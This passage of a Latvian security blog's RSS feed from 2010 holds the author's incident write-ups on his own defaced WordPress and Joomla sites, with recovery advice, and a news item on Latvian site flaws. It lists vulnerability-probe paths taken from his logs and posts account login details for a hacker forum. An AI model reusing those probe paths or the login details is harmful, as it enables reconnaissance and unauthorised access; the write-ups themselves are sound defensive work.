<p>pēdējā un svaigākā no pods.lv <img src='http://dll.lv/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Atveru pods.lv- tiešām pie pēdējiem komentāriem &#8220;Hacked by n2n&#8221;:<a href="http://dll.lv/wp-content/uploads/2010/05/pods.png"><img class="aligncenter size-medium wp-image-1104" title="pods" src="http://dll.lv/wp-content/uploads/2010/05/pods-300x63.png" alt="" width="300" height="63" /></a></p>
<p>Cik sapratu, tas ir plugins, kas attēlo saistītos rakstus un tiklīdz manam rakstam nomainījās nosaukums, tas attēlojās iekš pods.lv.</p>
<p>Viltus trauksme ejam tālāk.</p>
<p>Kas mums ir ar apmeklējumu?</p>
<p>1 apmeklētās apskatījis- 408 lapas un uztaisījis 1507 hitus- uztaisītu noteikti vairāk, ja nepiegrieztu pieeju <img src='http://dll.lv/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Skatāmies, ko viņš ir vēris vaļā:</p>
<p><a href="http://dll.lv/wp-content/uploads/2010/05/ajax.png"><img class="aligncenter size-medium wp-image-1106" title="ajax" src="http://dll.lv/wp-content/uploads/2010/05/ajax-300x35.png" alt="" width="300" height="35" /></a></p>
<p>Tātad ievainojamība bija šajā failā.</p>
<p>Skatāmies vai varam sazīmēt ļauno IP adresi- varam 41.99.45.23. Google piedāvā <a href="http://ip-whois-lookup.com/lookup.php?ip=41.99.45.23" target="_blank">izsmalcināti info</a> par to.</p>
<p>Atveru wordpres.org un skatos vai nav konstatēta kļūda šinī failā un 2.9.2(pēdējā aktuālā uz to brīdi)-<strong> viss kārtībā, kļūda ir bet par to publika vēl nezin </strong> <img src='http://dll.lv/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Vairākos forumos (piemēram <a href="http://wordpress.org/support/topic/359446" target="_blank">šinī</a>) ir arī konstatēta šāda problēma, bet pagaidām bez atrisinājuma.</p>
<p>Atveru googli un mēģinu kaut ko sagooglēt.</p>
<p>Martā vienā<a href="http://sql-injection-tools.blogspot.com/2010/03/wordpress-sqlrficgi-scanner.html" target="_blank"> lapā</a> ir publicēts skaners, kas mēģina exploitēt arī šo failu.</p>
<p>Iespējams, ka pret mani tika pielietots tieši šis <img src='http://dll.lv/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  Vēlāk biju domājis paeksperimentēt ko viņš tieši dara, kā strādā un kādus rezultātus var iegūt, bet kaut kā vēl līdz šai dienai nav sanācis laiks.</p>
<p>Atšķirībā no iepriekšējā raksta &#8220;<a href="http://dll.lv/hackeri-uzbruk-vai-gadas-ari-ta" target="_blank">Hackeri uzbrūk</a>&#8220;- šoreiz ir pieejami apache access logs.</p>
<p>Sākumā ar lielu entuziasmu, bet pēc tam ar apnicību gāju tam cauri. Tomēr neko sakarīgu atrast neizdevās.</p>
<p>Visu laiku viens un tas pats-</p>
<p>1) admin-ajax.php failam tiek veikts POST pieprasījums- ļoti žēļ, ka apacis nelogo POST pieprasījumus, tas uzreiz atviegloto manu darbu un dotu skaidru atbildi- ko īsti brīnumdaris tur darīja.</p>
<blockquote><p>Pats nepārbaudīju, bet uz ātro atradu pamācību, <a href="http://www.cyberciti.biz/faq/apache-mod_dumpio-log-post-data/" target="_blank">kā iemācīt apacim logot</a> POST datus. Daudzi cepjās- logs augs nejēgā un to visu saglabāt nebūs iespējams, protams, bet ir jau alternatīvas- glabājam īsāku laiku, kopējam uz citurieni, utt. Viss ir atkarīgs vai no šādas info ir jēga- uzlaušanas gadījumā ir.</p></blockquote>
<p>2) atgriezts rezultāts, pēc tam tiek veikts mistisks GET- cik sapratu atkarībā no POST pieprasījuma rezultāta.</p>
<p><strong>Kas tad beigās tika izdarīts?</strong></p>
<ul>
<li>Veidojot mistiskos pieprasījumus <a href="http://dll.lv/wp-admin/admin-ajax.php">http://dll.lv/wp-admin/admin-ajax.php</a> failam brīnumdaris bija izdevies pārvietot lielu daļu rakstu uz trash.</li>
<li>Viņa posts &#8220;Hacked by n2n&#8221;, nebija izveidots no jauna, bet vienam rakstam no 2009, gada tika nomainīts saturs un virsraksts.</li>
<li>Tika izdzēsti visi tagi</li>
<li>Beigās izdevās nomainīt admin lietotāja epastu un tādā veidā iegūstot admina paroli.</li>
</ul>
<p>!!!AAA tiko ienāca prātā- vai tikai nebija ievietojis kādā no rakstiem javascript, kas nostrādāja, kad biju ielogojis admin sadaļā un tādā veidā nomainīja admin epasta adresi?</p>
<p>Par labu šai teorijai ir fakts, ka epastu nomainīja apmēram 2. minūtes pēc tam, kad mājās biju ielogojies administrēšanas sadaļā, kaut gan uzbrukums jau bija sācies 1h atpakaļ.</p>
<p>Varbūt sakritība. Bet pārbaudīt man to vairs neizdosies, jo visu iepriekšējo saturu jau esmu izdzēsis.</p>
<p><strong>Secinājumi:</strong><strong> </strong></p>
<p>Kārtējo reizi apstiprinās- uzstādod pēdējo &#8220;drošo&#8221; versiju, neviens nav pasargāts tik un tā.</p>
<p>Uzhakos ne tikai Windows, bet arī ar wordpress..</p>
<p>Backup- tas ir spēks <img src='http://dll.lv/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p><strong>Manas darbības pēc tam?</strong><strong> </strong></p>
<p>Viss kā pēc grāmatas-</p>
<p>Lādējam no wordpres.org wordpress un pluginus no jauna (jo pastāv iespēja, ka esošajā struktūrā ir izveidoti backdoor),</p>
<p>Izveidojam jaunu datubāzi</p>
<p>No rezerves kopijas paceļam pēdējo &#8220;drošo&#8221; DB versiju (izvēlējos nedēļu pirms uzbrukuma, jo man tā pat pa vidu bija tikai 1 posts.)</p>
<p>Šoreiz nevis vienkārši admin lietotājam uzstādam sarežģītu paroli, bet to izdzēšam.</p>
<p>Uzstādam jaunas paroles.</p>
<p>Meklējam rakstus par wordpress drošību (izrādās viņu ir pa pilno, piemēram<a href="http://sixrevisions.com/wordpress/12-essential-security-tips-and-hacks-for-wordpress/" target="_blank"> šāds</a>) un izpildām to norādījumus <img src='http://dll.lv/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Uzstādam wordpress plugin (<a href="http://wordpress.org/extend/plugins/wp-secure-by-sitesecuritymonitorcom/">http://wordpress.org/extend/plugins/wp-secure-by-sitesecuritymonitorcom/</a>), kas palielina drošību.</p>
<p>Uzstādam plugin (<a href="http://wordpress.org/extend/plugins/threat-scan-plugin/">http://wordpress.org/extend/plugins/threat-scan-plugin/</a>) , kas pārbauda vai sistēmā nav kaut kas ieperinājies.</p>
<p>Esam nemitīgā stresā <img src='http://dll.lv/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Related posts:<ol>
<li><a href='http://dll.lv/hackeri-uzbruk-vai-gadas-ari-ta' rel='bookmark' title='Hackeri uzbrūk vai gadās arī tā'>Hackeri uzbrūk vai gadās arī tā</a></li>
<li><a href='http://dll.lv/nozagtas-facebook-lietotaju-paroles' rel='bookmark' title='Nozagtas Facebook lietotāju paroles'>Nozagtas Facebook lietotāju paroles</a></li>
<li><a href='http://dll.lv/drosibas-caurums-csdd-un-parex-majaslapa' rel='bookmark' title='Drošības caurums CSDD un Parex mājaslapā'>Drošības caurums CSDD un Parex mājaslapā</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/second-step-in-forensic-investigation-vai-hackeri-uzbruk-2/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Security golden rules</title>
		<link>http://dll.lv/security-golden-rules?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=security-golden-rules</link>
		<comments>http://dll.lv/security-golden-rules#comments</comments>
		<pubDate>Sat, 08 May 2010 11:50:47 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Domu grauds]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[drošības likums]]></category>
		<category><![CDATA[IT]]></category>
		<category><![CDATA[IT drošība]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=589</guid>
		<description><![CDATA[&#8220;The three golden rules to ensure computer security are: do not own a computer; do not power it on; and do not use it.&#8221; (Robert T. Morris). Related posts: Aizstājam vai izmainām izvadāmo kodu izmantojot javascript Atbrīvojamies no komentāru spama &#8230; <a href="http://dll.lv/security-golden-rules">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/aizstajam-vai-izmainam-izvadamo-kodu-izmantojot-javascript' rel='bookmark' title='Aizstājam vai izmainām izvadāmo kodu izmantojot javascript'>Aizstājam vai izmainām izvadāmo kodu izmantojot javascript</a></li>
<li><a href='http://dll.lv/atbrivojamies-no-komentaru-spama' rel='bookmark' title='Atbrīvojamies no komentāru spama'>Atbrīvojamies no komentāru spama</a></li>
<li><a href='http://dll.lv/lapas-redirect' rel='bookmark' title='Lapas redirect'>Lapas redirect</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>&#8220;The three golden rules to ensure computer security are:</p>
<p>do not own a computer;</p>
<p>do not power it on;</p>
<p>and do not use it.&#8221; (Robert T. Morris).</p>
<p>Related posts:<ol>
<li><a href='http://dll.lv/aizstajam-vai-izmainam-izvadamo-kodu-izmantojot-javascript' rel='bookmark' title='Aizstājam vai izmainām izvadāmo kodu izmantojot javascript'>Aizstājam vai izmainām izvadāmo kodu izmantojot javascript</a></li>
<li><a href='http://dll.lv/atbrivojamies-no-komentaru-spama' rel='bookmark' title='Atbrīvojamies no komentāru spama'>Atbrīvojamies no komentāru spama</a></li>
<li><a href='http://dll.lv/lapas-redirect' rel='bookmark' title='Lapas redirect'>Lapas redirect</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/security-golden-rules/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Hackeri uzbrūk vai gadās arī tā</title>
		<link>http://dll.lv/hackeri-uzbruk-vai-gadas-ari-ta?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=hackeri-uzbruk-vai-gadas-ari-ta</link>
		<comments>http://dll.lv/hackeri-uzbruk-vai-gadas-ari-ta#comments</comments>
		<pubDate>Wed, 05 May 2010 06:00:05 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošība]]></category>
		<category><![CDATA[Drošības caurumi]]></category>
		<category><![CDATA[How to]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[audits]]></category>
		<category><![CDATA[autentifikācija]]></category>
		<category><![CDATA[autorizācija]]></category>
		<category><![CDATA[drošības prasības]]></category>
		<category><![CDATA[drošības testēšana]]></category>
		<category><![CDATA[Incidents]]></category>
		<category><![CDATA[IT]]></category>
		<category><![CDATA[IT drošība]]></category>
		<category><![CDATA[IT projektu problēms]]></category>
		<category><![CDATA[kodējam]]></category>
		<category><![CDATA[pieredze]]></category>
		<category><![CDATA[projekti]]></category>
		<category><![CDATA[web izstrāde]]></category>
		<category><![CDATA[zināšanas]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=964</guid>
		<description><![CDATA[Vakar izdomāju sakārtot savu WEB saimniecību un izdzēst uz servera aktualitāti zaudējušas lietas- dažādas testa lapas, izstrādes vides, utt. Tā kā esmu jau aizmirsi, kas man tikai nestāv atveru FTP klientu, lai paskatītos direktoriju saturu. Identificēju trīs izstrādes lapas, kuras &#8230; <a href="http://dll.lv/hackeri-uzbruk-vai-gadas-ari-ta">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/nozagtas-facebook-lietotaju-paroles' rel='bookmark' title='Nozagtas Facebook lietotāju paroles'>Nozagtas Facebook lietotāju paroles</a></li>
<li><a href='http://dll.lv/drosibas-caurums-csdd-un-parex-majaslapa' rel='bookmark' title='Drošības caurums CSDD un Parex mājaslapā'>Drošības caurums CSDD un Parex mājaslapā</a></li>
<li><a href='http://dll.lv/google-i-nozagts-gaia-izejas-kods' rel='bookmark' title='Google (i) nozagts Gaia izejas kods :)'>Google (i) nozagts Gaia izejas kods :)</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Vakar izdomāju sakārtot savu WEB saimniecību un izdzēst uz servera aktualitāti zaudējušas lietas- dažādas testa lapas, izstrādes vides, utt.</p>
<p>Tā kā esmu jau aizmirsi, kas man tikai nestāv atveru FTP klientu, lai paskatītos direktoriju saturu.</p>
<p>Identificēju trīs izstrādes lapas, kuras jau ir nodotas un tātad tās var dzēst ārā. Tā kā miglaini atceros, kuras tās bija, tad ar lielu interesi ievadu pirmo:</p>
<p>http://dll.lv/test</p>
<p>Un mani sagaida brīnums <img src='http://dll.lv/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p><a href="http://dll.lv/wp-content/uploads/2010/05/hacked.png"><img class="aligncenter size-medium wp-image-966" title="hacked" src="http://dll.lv/wp-content/uploads/2010/05/hacked-300x123.png" alt="" width="300" height="123" /></a></p>
<p>Neliels pārsteigums&#8230;<span id="more-964"></span></p>
<p>Pārējās lapās izmaiņas nav konstatētas un tās tiek izdzēstas <img src='http://dll.lv/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Gribu saprasta kas un kā.</p>
<p>Skatos failu struktūra vietā, bet ir parādījies jauns fails index.html (faila izveidošanas datums 17.03.2010- tāda vairāk kā mēnesi atpakaļ <img src='http://dll.lv/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  ), lai tas netraucētu gaisu pārsaucu par index.html1.</p>
<p>Skatāmies, kas notiek ar pašu joomla: <a href="http://dll.lv/wp-content/uploads/2010/05/joomla.png"><img class="aligncenter size-medium wp-image-968" title="joomla" src="http://dll.lv/wp-content/uploads/2010/05/joomla-300x30.png" alt="" width="300" height="30" /></a>Izskatās, ka arī datubāzi izdzēsis- atveru phpmyadmin un tiešām:</p>
<p><a href="http://dll.lv/wp-content/uploads/2010/05/phpmyadmin.png"><img class="aligncenter size-medium wp-image-969" title="phpmyadmin" src="http://dll.lv/wp-content/uploads/2010/05/phpmyadmin-300x107.png" alt="" width="300" height="107" /></a></p>
<p>Paskatos joomla config failu:</p>
<p><a href="http://dll.lv/wp-content/uploads/2010/05/konfig.png"><img class="aligncenter size-medium wp-image-967" title="konfig" src="http://dll.lv/wp-content/uploads/2010/05/konfig-300x125.png" alt="" width="300" height="125" /></a>Tas atbild uz jautājumu, kāpēc nav izdzēst viss pārējais- katrai testa sistēmai veidoju vienu  datubāzi un vienu lietotāju, kuram pieeja ir tikai konkrētai datubāzei. Izskatās, ka tas mani ir arī paglābis un brīnumdaris nenonesa pilnīgi visu.</p>
<p>Nav miera un gribu paskatīties dziļāk:</p>
<ul>
<li>Joomla logs izdzēsts ar visu datubāzi</li>
<li>Skatos Apache access log-  ieraksti ir pieejami tikai par pēdējo mēnesi, un līdz 17. maijam vairs nesniedzas. Izmainu konfigurāciju, lai turpmāk visus vecos log failus saarhivē un saglabā (iespējams noderēs, bet ceru ka nē <img src='http://dll.lv/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  ).</li>
<li>Skatos error_log- arī nekā.</li>
</ul>
<p>Hosters piedāvā webalizer un awstat:</p>
<ul>
<li>No webalizer kādu sakarīgu info izdabūt neizdodas.</li>
<li>Awstat-</li>
</ul>
<ol>
<li>no sākuma intresē, kā viņš ir mani uzgājis- pārbaudu meklētājos izmantotos keywords un keyphrases, par februāri un martu, bet nekā aizdomīga neatradu. Sagaidīju atrast kaut ko līdzīgu &#8220;joomla include &#8220;&#8221;", vai ko tamlīdzīgu.</li>
<li>Skatos, ko mēs varam sazīmēt saistībā ar IP adresēm- iegūstu IP adrešu sarakstu par martu un februāri, tomēr šis saraksts neuzrāda apmeklējuma dienu, līdz ar to nav īpaši noderīgs, ja vien netaisos pārbaudīt katru IP atsevišķi- ko es noteikti nedarīšu, jo tas ir pārāk laikietilpīgi (bet ja būtu noticis kas nozīmīgs, iespējams, arī būtu sācis pārbaudi).</li>
<li>Skatos apmeklētās lapas par februāri un martu- ir apmeklēta tikai http://dll.lv/test/, bet http://dll.lv/test/administrator nav apmeklēta. Dīvaini- jo biju izvirzījis hipotēzi, ka uzlaušana notika, jo administratora parole testa videi bija triviāla, bet ja administrēšanas lapa netika apmeklēta šis pieņēmums neapstiprinās.</li>
<li>Meklētās lapas, kuras netika atrastas vai atgrieza kļūdas paziņojumu- nekas interesants saistībā ar testa vidi, bet skatoties atklājās, ka kāds ir meklējis arī ievainojamības pašā blogā. Uz to norāda, piemēram šādi ieraksti:</li>
<p>///administrator/components/com_virtuemart/export.php<br />
/wp-content%20%C2%BB%3Ca%20href=<br />
/guestbook/public/paypal.fr/webscrcmd=_login-run/cgi-bin/login/Confirm.php<br />
/_vti_bin/owssvr.dll<br />
//path/authentication/phpbb3/phpbb3.functions.php<br />
utt.</p>
<li>Skatos ārējos refferers un starp tiem aizdomīga ir tikai http://www.sa-hacker.com/vb/showthread.php.</li>
</ol>
<p>Izskatās, ka esmu kaut ko uzķēris un droši veru lapu vaļā, bet ir aplauziens- viss ir arābu valodā un lai arī kaut ko redzētu ir nepieciešams reģistrēties. Reģistrācijai palīdz google tulkotājs, jo no tiem ķeburiem neko saprast nevar (ja kādam ir intrese par turieni paložņāt- user: zumzum, pass:zumzumzum, email:zumzum@spam.la). Izmeklējos par forumu, bet tomēr neko sakarīgu neatradu.</p>
<p>Kāds tad ir sausais atlikums?</p>
<p>Pēc analīzes secinu, ka ir izdzēsta datubāze, izveidots viens jauns fails, bet pārējā failu struktūra nav mainīta vai dzēsta.</p>
<p>Diemžēl nesanāca atklāt kādā veidā šis brīnums tika pastrādāts un līdz ar to neko prātīgu ieteikt neizdodas (iespējams bija novecojusi un bug -aina joomla vai tās komponente (tas gan mazticams, jo webalizer neuzrādīja apmeklētas kādas lapas, piemēram: dll.lv/test/component/crack.php?upload&#8230;) versija).</p>
<p>No šiem meistariem neesam pasargāti, bet, lai mazinātu to ietekmi:</p>
<ul>
<li>taisām backup</li>
<li>katrai sistēmai izdalām savu DB un atsevišķu lietotāju, kuram nav piekļuve citām datubāzēm.</li>
<li>saglabājam auditācijas pierakstus ilgāk..</li>
<li>vienmēr uzstādam pēdējos drošības ielāpus</li>
<li>ja ir iespēja uzstādīt papildus perimetra aizsardzību, piemēram, revers proxy</li>
<li>ja gadījies kāds incidents, tad to iespēju robežās izmeklējam un izdarām secinājumus, nevis ignorējam un ceram, ka tas neatkārtosies.</li>
</ul>
<p>PS.<br />
Tagad laikam ir īstais brīdis pateikt ko es domāju par šiem brīnumdariem-<strong> neko labu</strong>.</p>
<p>Manās acīs tie ir visādi mūdži, kuri nodarbojas tikai ar savu ģenitāliju staipīšanu.<br />
Cita lieta ir drošības speciālisti, kuri atklāj, konsultē un palīdz novērst (par naudu- protams) drošības ievainojamības vai ari hackeri, kuri iegūto informāciju izmanto ekonomisku labumu gūšanai, piemēram, izpirkuma maksas pieprasīšanai vai citas informācijas iegūšanai, ar kuru pēc tam operējot var uztaisīt skanošo- piemēram, kā ukraiņu <a title="http://dll.lv/interesanti-par-ukrainu-urki-oleksandr-dorozhko/" href="http://dll.lv/interesanti-par-ukrainu-urki-oleksandr-dorozhko/" target="_blank">hakers</a>.</p>
<p>Bet vienkārši atrast lapu ar konkrētu ievainojamību, to izdzēst, nemaz neiedziļinoties kam tā pieder un kam tā kalpo?? Tas, manuprāt, ir zem jebkāda goda, kaut palasot pievienotās rindiņas index failam- šim cilvēkam no Palestīnas tāda nemaz nav bijis kopš dzimšanas:</p>
<blockquote><p><span style="font-family: Times New Roman; color: #ff0000; font-size: large;">I aM: A FrEe PaLeStIn!aN&#8217;s HaCK3eR</span></p>
<p><span style="font-family: Times New Roman; color: #fdd017; font-size: large;">I DoN&#8217;t ApPeAr InTelLeGaNcE, BuT I AiM To DeStRoY InTeLlEgAnT</span></p>
<p><span style="font-family: Times New Roman; color: #ff0000; font-size: large;">DoN&#8217;t ChAlLeNg A PeRsOn WhO HaS N0N To LoSe</span></p>
<p><span style="font-family: Times New Roman; color: #fdd017; font-size: large;">PlAyInG WiTh Ch!LdReN DoSeN&#8217;t EnTeRtA!N Me<br />
</span></p>
<p>AdM!n DoN&#8217;t CrY&#8230;.. CrY!Ng Is N0T A MaN&#8217;s ShArM</p></blockquote>
<p>Related posts:<ol>
<li><a href='http://dll.lv/nozagtas-facebook-lietotaju-paroles' rel='bookmark' title='Nozagtas Facebook lietotāju paroles'>Nozagtas Facebook lietotāju paroles</a></li>
<li><a href='http://dll.lv/drosibas-caurums-csdd-un-parex-majaslapa' rel='bookmark' title='Drošības caurums CSDD un Parex mājaslapā'>Drošības caurums CSDD un Parex mājaslapā</a></li>
<li><a href='http://dll.lv/google-i-nozagts-gaia-izejas-kods' rel='bookmark' title='Google (i) nozagts Gaia izejas kods :)'>Google (i) nozagts Gaia izejas kods :)</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/hackeri-uzbruk-vai-gadas-ari-ta/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Drošības caurums CSDD un Parex mājaslapā</title>
		<link>http://dll.lv/drosibas-caurums-csdd-un-parex-majaslapa?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=drosibas-caurums-csdd-un-parex-majaslapa</link>
		<comments>http://dll.lv/drosibas-caurums-csdd-un-parex-majaslapa#comments</comments>
		<pubDate>Thu, 29 Apr 2010 09:11:22 +0000</pubDate>
		<dc:creator>Kaspars</dc:creator>
				<category><![CDATA[Drošība]]></category>
		<category><![CDATA[Drošības caurumi]]></category>
		<category><![CDATA[Interesanti]]></category>
		<category><![CDATA[Kopums]]></category>
		<category><![CDATA[audits]]></category>
		<category><![CDATA[autentifikācija]]></category>
		<category><![CDATA[autorizācija]]></category>
		<category><![CDATA[drošības prasības]]></category>
		<category><![CDATA[drošības testēšana]]></category>
		<category><![CDATA[Incidents]]></category>
		<category><![CDATA[IT]]></category>
		<category><![CDATA[IT drošība]]></category>
		<category><![CDATA[IT projektu problēms]]></category>
		<category><![CDATA[kodējam]]></category>
		<category><![CDATA[pieredze]]></category>
		<category><![CDATA[projekti]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[web izstrāde]]></category>
		<category><![CDATA[zināšanas]]></category>

		<guid isPermaLink="false">http://dll.lv/?p=953</guid>
		<description><![CDATA[Kā ziņo Defacto CSDD datubāzē ir tieši tāds pats caurums, kā VID EDS sistēmā, kad mainot pieprasījuma numuru ir iespējams apskatīt citu lietotāju automašīnas datus. Parex bankas gadījumā ir iespējams izmainīt attēlojamo informāciju Parex mājas lapā. Interesanti gan liekas fakts, &#8230; <a href="http://dll.lv/drosibas-caurums-csdd-un-parex-majaslapa">Continue reading <span class="meta-nav">&#8594;</span></a>
Related posts:<ol>
<li><a href='http://dll.lv/nozagtas-facebook-lietotaju-paroles' rel='bookmark' title='Nozagtas Facebook lietotāju paroles'>Nozagtas Facebook lietotāju paroles</a></li>
<li><a href='http://dll.lv/google-i-nozagts-gaia-izejas-kods' rel='bookmark' title='Google (i) nozagts Gaia izejas kods :)'>Google (i) nozagts Gaia izejas kods :)</a></li>
<li><a href='http://dll.lv/banku-internetbanku-autentifikacijas-un-autorizacijas-drosibas-salidzinajums' rel='bookmark' title='Banku internetbanku autentifikācijas un autorizācijas drošības salīdzinājums'>Banku internetbanku autentifikācijas un autorizācijas drošības salīdzinājums</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Kā ziņo <a title="http://www.ltvzinas.lv/?n=video&amp;id=1543" href="http://www.ltvzinas.lv/?n=video&amp;id=1543" target="_blank">Defacto</a> CSDD datubāzē ir tieši tāds pats caurums, kā VID EDS sistēmā, kad mainot pieprasījuma numuru ir iespējams apskatīt citu lietotāju automašīnas datus.<br />
Parex bankas gadījumā ir iespējams izmainīt attēlojamo informāciju Parex mājas lapā.<br />
Interesanti gan liekas fakts, ka banka it kā esot vairākkārt informēta par šo caurumu, tomēr nekāda rīcība nav sekojusi.<br />
Raidījuma atkārtojumu var noskatīties <a title="http://www.youtube.com/watch?v=M66y5ZutmLs&amp;feature=player_embedded" href="http://www.youtube.com/watch?v=M66y5ZutmLs&amp;feature=player_embedded" target="_blank">youtube</a>.</p>
<p>Related posts:<ol>
<li><a href='http://dll.lv/nozagtas-facebook-lietotaju-paroles' rel='bookmark' title='Nozagtas Facebook lietotāju paroles'>Nozagtas Facebook lietotāju paroles</a></li>
<li><a href='http://dll.lv/google-i-nozagts-gaia-izejas-kods' rel='bookmark' title='Google (i) nozagts Gaia izejas kods :)'>Google (i) nozagts Gaia izejas kods :)</a></li>
<li><a href='http://dll.lv/banku-internetbanku-autentifikacijas-un-autorizacijas-drosibas-salidzinajums' rel='bookmark' title='Banku internetbanku autentifikācijas un autorizācijas drošības salīdzinājums'>Banku internetbanku autentifikācijas un autorizācijas drošības salīdzinājums</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://dll.lv/drosibas-caurums-csdd-un-parex-majaslapa/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>

